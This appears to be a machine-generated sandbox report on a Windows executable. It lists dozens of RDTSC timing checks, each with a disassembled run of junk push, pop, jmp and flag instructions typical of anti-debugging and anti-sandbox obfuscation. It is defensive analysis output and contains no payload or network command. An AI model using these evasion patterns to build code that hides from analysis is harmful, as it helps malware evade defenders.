Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C552E second address: 11C553C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C599C second address: 11C59A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C59A2 second address: 11C59D8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD2CCE084F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FD2CCE084F8h 0x00000012 pop eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jmp 00007FD2CCE08509h 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5B15 second address: 11C5B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5B1B second address: 11C5B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5B21 second address: 11C5B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5C6D second address: 11C5C8E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2CCE084F6h 0x00000008 jmp 00007FD2CCE084FDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FD2CCE084FAh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5C8E second address: 11C5C93 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5C93 second address: 11C5C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5C9C second address: 11C5CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5CA2 second address: 11C5CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11CA591 second address: 11CA596 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0EE4 second address: 57B0F16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FD2CCE08502h 0x0000000c xor ah, 00000018h 0x0000000f jmp 00007FD2CCE084FBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0F16 second address: 57B0F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0F1A second address: 57B0F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0F20 second address: 57B0F4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CC8277F8h 0x00000008 mov cx, 9AC1h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD2CC8277EAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0F4F second address: 57B0FB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD2CCE08507h 0x0000000b sub ax, 4D9Eh 0x00000010 jmp 00007FD2CCE08509h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FD2CCE084FEh 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov dx, cx 0x00000025 mov cx, B829h 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov dh, 07h 0x00000030 movzx ecx, di 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0FB2 second address: 57B0FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0FB8 second address: 57B0FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0E54 second address: 57A0E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0E71 second address: 57A0F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c mov bh, C8h 0x0000000e pop eax 0x0000000f pushfd 0x00000010 jmp 00007FD2CCE08505h 0x00000015 sbb ecx, 00B93DF6h 0x0000001b jmp 00007FD2CCE08501h 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD2CCE08507h 0x0000002a and al, 0000002Eh 0x0000002d jmp 00007FD2CCE08509h 0x00000032 popfd 0x00000033 mov dx, si 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FD2CCE08506h 0x00000040 jmp 00007FD2CCE08505h 0x00000045 popfd 0x00000046 mov bl, ch 0x00000048 popad 0x00000049 mov bx, 4320h 0x0000004d popad 0x0000004e mov ebp, esp 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0F36 second address: 57A0F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0F3A second address: 57A0F4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F0019 second address: 57F001D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F001D second address: 57F0023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F0023 second address: 57F0029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F0029 second address: 57F002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F002D second address: 57F0048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F0048 second address: 57F004C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F004C second address: 57F0050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F0050 second address: 57F0056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57F0056 second address: 57F0081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD2CC8277F5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 578019C second address: 57801D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FD2CCE084FBh 0x0000000b sub cl, FFFFFFFEh 0x0000000e jmp 00007FD2CCE08509h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a pushad 0x0000001b mov edi, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f mov bh, ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57801D7 second address: 57801DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57801DB second address: 57801F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD2CCE084FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57801F0 second address: 57801F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57801F6 second address: 5780212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780212 second address: 5780216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780216 second address: 578021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 578021A second address: 5780220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780220 second address: 5780226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780226 second address: 5780254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD2CC8277F7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57802AE second address: 57802B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57802B4 second address: 57802B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0BF0 second address: 57A0BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0BF6 second address: 57A0C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edx 0x0000000e pushfd 0x0000000f jmp 00007FD2CC8277F7h 0x00000014 xor esi, 433E726Eh 0x0000001a jmp 00007FD2CC8277F9h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A079C second address: 57A07CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD2CCE08507h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A07CE second address: 57A0822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 4Ch 0x0000000d pushfd 0x0000000e jmp 00007FD2CC8277F8h 0x00000013 sub eax, 1BAC1DC8h 0x00000019 jmp 00007FD2CC8277EBh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0822 second address: 57A0826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0826 second address: 57A082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A082C second address: 57A0854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov si, 807Dh 0x00000010 mov ax, A779h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD2CCE084FBh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0854 second address: 57A085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A085A second address: 57A085E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A06FA second address: 57A0700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0700 second address: 57A0745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD2CCE08502h 0x00000010 sub eax, 34B67F88h 0x00000016 jmp 00007FD2CCE084FBh 0x0000001b popfd 0x0000001c mov dh, ah 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD2CCE084FEh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A04F1 second address: 57A04F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A04F7 second address: 57A04FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A04FB second address: 57A052C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD2CC8277F5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A052C second address: 57A0552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2CCE084FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0552 second address: 57A0562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CC8277ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0562 second address: 57A0566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B023B second address: 57B02A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, cx 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FD2CC8277F4h 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FD2CC8277F1h 0x00000018 sub si, F586h 0x0000001d jmp 00007FD2CC8277F1h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007FD2CC8277EDh 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD2CC8277EDh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C0277 second address: 57C027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C027B second address: 57C0281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C0281 second address: 57C029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C029F second address: 57C02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD2CC8277F3h 0x0000000a or ecx, 6DA5D91Eh 0x00000010 jmp 00007FD2CC8277F9h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C02D8 second address: 57C03AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CCE08507h 0x00000008 pushfd 0x00000009 jmp 00007FD2CCE08508h 0x0000000e sbb cl, 00000078h 0x00000011 jmp 00007FD2CCE084FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FD2CCE08509h 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 mov dh, ch 0x00000024 pushfd 0x00000025 jmp 00007FD2CCE08509h 0x0000002a add eax, 1355D376h 0x00000030 jmp 00007FD2CCE08501h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 jmp 00007FD2CCE084FEh 0x0000003e mov eax, dword ptr [ebp+08h] 0x00000041 pushad 0x00000042 call 00007FD2CCE084FDh 0x00000047 jmp 00007FD2CCE08500h 0x0000004c pop esi 0x0000004d popad 0x0000004e and dword ptr [eax], 00000000h 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 mov si, 6409h 0x00000058 pushad 0x00000059 popad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0E57 second address: 57B0E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, F2h 0x00000005 mov ch, A6h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0E68 second address: 57B0E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0E6C second address: 57B0E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0E72 second address: 57B0EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08507h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2CCE08505h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C012A second address: 57C015C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD2CC8277F0h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C015C second address: 57C0162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C0162 second address: 57C01A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD2CC8277EEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FD2CC8277EDh 0x0000001c jmp 00007FD2CC8277EBh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C01A5 second address: 57C01AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57C01AA second address: 57C01C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, B5B6h 0x00000011 mov esi, ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57E070C second address: 57E075E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD2CCE08506h 0x0000000f push eax 0x00000010 jmp 00007FD2CCE084FBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FD2CCE08506h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push edx 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57E075E second address: 57E0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57E0763 second address: 57E0769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57E08D5 second address: 57E08E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
